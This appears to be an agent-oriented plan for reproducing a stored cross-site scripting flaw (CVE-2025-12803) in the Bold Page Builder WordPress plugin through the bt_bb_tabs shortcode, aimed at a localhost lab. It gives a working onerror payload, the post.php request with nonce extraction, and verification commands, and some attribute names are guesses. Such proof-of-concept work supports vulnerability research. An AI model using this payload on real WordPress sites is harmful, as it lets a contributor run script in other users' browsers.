Bold Builder <= 5.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via bt_bb_tabs Shortcode

This research plan focuses on identifying and exploiting a Stored Cross-Site Scripting (XSS) vulnerability in the Bold Page Builder plugin (version <= 5.5.1) via the bt_bb_tabs shortcode.

---

1. Vulnerability Summary

• ID: CVE-2025-12803
• Vulnerability Type: Stored Cross-Site Scripting (XSS)
• Component: bt_bb_tabs shortcode
• Root Cause: The plugin fails to sanitize or escape user-supplied attributes within the bt_bb_tabs shortcode. When the shortcode is rendered on the frontend, these attributes are reflected into the HTML source, allowing for the execution of arbitrary JavaScript.
• Privilege Level: Contributor or higher (users who can create or edit posts).

2. Attack Vector Analysis

• Endpoint: wp-admin/post.php (for updating) or wp-admin/post-new.php (for creating).
• Method: HTTP POST.
• Vulnerable Parameter: content (which contains the [bt_bb_tabs ...] shortcode).
• Vulnerable Attributes (Inferred): Shortcodes in Bold Builder typically use attributes like el_id, el_class, title, or tab_id. We will target these common identifiers.
• Preconditions: The Bold Page Builder plugin must be active. The attacker needs a Contributor-level account.

3. Code Flow

1. Registration: The plugin registers the shortcode, likely via add_shortcode( 'bt_bb_tabs', ... ) in the main plugin file or an included shortcode definitions file (e.g., bt_bb_tabs.php or bold-builder.php).
2. Handling: When a post is viewed, WordPress parses the content and calls the callback function associated with bt_bb_tabs.
3. Extraction: The callback typically uses shortcode_atts() to extract attributes from the shortcode.
4. Rendering (Sink): The function constructs an HTML string (e.g., <div id="..." class="...">...</div>) using the extracted attributes. If these are concatenated into the string without esc_attr() or esc_html(), XSS occurs.
5. Output: The generated HTML is returned by the shortcode function and printed to the page.

4. Nonce Acquisition Strategy

Since the exploit involves creating or editing a post as a Contributor, we need the standard WordPress post-editing nonces.

1. Login: Authenticate as a Contributor user.
2. Navigate: Use browser_navigate to go to /wp-admin/post-new.php.
3. Extract Nonces: Use browser_eval to extract the necessary nonces from the page source:
   • _wpnonce: The main nonce for post operations.
   • user_id: The current user's ID.
   • post_ID: The ID of the newly created (auto-draft) post.

   {
       wpnonce: document.getElementById('_wpnonce').value,
       post_id: document.getElementById('post_ID').value
   }
   

4. Plugin-Specific Nonces: Bold Builder often localizes data for its editor. We should check for variables like bt_bb_settings or similar if the standard post save doesn't trigger the shortcode processing. However, a standard wp-admin/post.php update is usually sufficient to store a shortcode.

5. Exploitation Strategy

We will inject a payload into common attributes of the bt_bb_tabs shortcode.

Step 1: Test for Injection Sinks
Create a post with a shortcode containing unique canaries to identify which attribute is reflected without escaping.

• Shortcode: [bt_bb_tabs el_id="canary_id" el_class="canary_class" title="canary_title"]

Step 2: Construct XSS Payload
Assuming el_id is vulnerable:

• Attribute Value: "><img src=x onerror=alert(document.domain)>
• Resulting Shortcode: [bt_bb_tabs el_id='"><img src=x onerror=alert(document.domain)>']

Step 3: Execute the Injection
Perform an HTTP POST request to wp-admin/post.php.

• URL: http://localhost:8080/wp-admin/post.php
• Headers: Content-Type: application/x-www-form-urlencoded
• Body Parameters:
  • action: editpost
  • post_ID: [EXTRACTED_POST_ID]
  • _wpnonce: [EXTRACTED_NONCE]
  • post_title: XSS Test
  • content: [bt_bb_tabs el_id='"><img src=x onerror=alert(document.domain)>']
  • post_status: publish

Step 4: Verification via Frontend
Navigate to the URL of the created post and check if the payload executes or exists in the raw HTML.

6. Test Data Setup

1. User: Create a user with the contributor role.
2. Plugin: Ensure bold-page-builder is installed and activated.
3. Target Page: An auto-draft post created when visiting post-new.php will serve as the target.

7. Expected Results

• Successful Storage: The post.php request returns a 302 redirect to the post editor with message=1 or message=6.
• Execution: When viewing the post frontend, the HTML will look like:
  <div id=""><img src=x onerror=alert(document.domain)>" class="bt_bb_tabs ...">
• Browser Behavior: An alert box showing the domain will appear if viewed in a browser.

8. Verification Steps

1. Verify Database Content: Use WP-CLI to check the stored post content.

   wp post get [POST_ID] --field=post_content
   

2. Check Frontend HTML: Use http_request to fetch the post and grep for the payload.

   http_request GET "http://localhost:8080/?p=[POST_ID]" | grep "onerror=alert"
   

9. Alternative Approaches

If el_id is sanitized, try other attributes known to Bold Builder:

• el_class
• title
• tab_id
• responsive
• publish_datetime (if Bold Builder supports scheduled display for specific tabs)

If the standard post.php update doesn't work, attempt to use the Bold Builder AJAX save mechanism if it has its own endpoint (e.g., bt_bb_save action in admin-ajax.php). Search the code for wp_ajax_bt_bb_ to find specialized save handlers.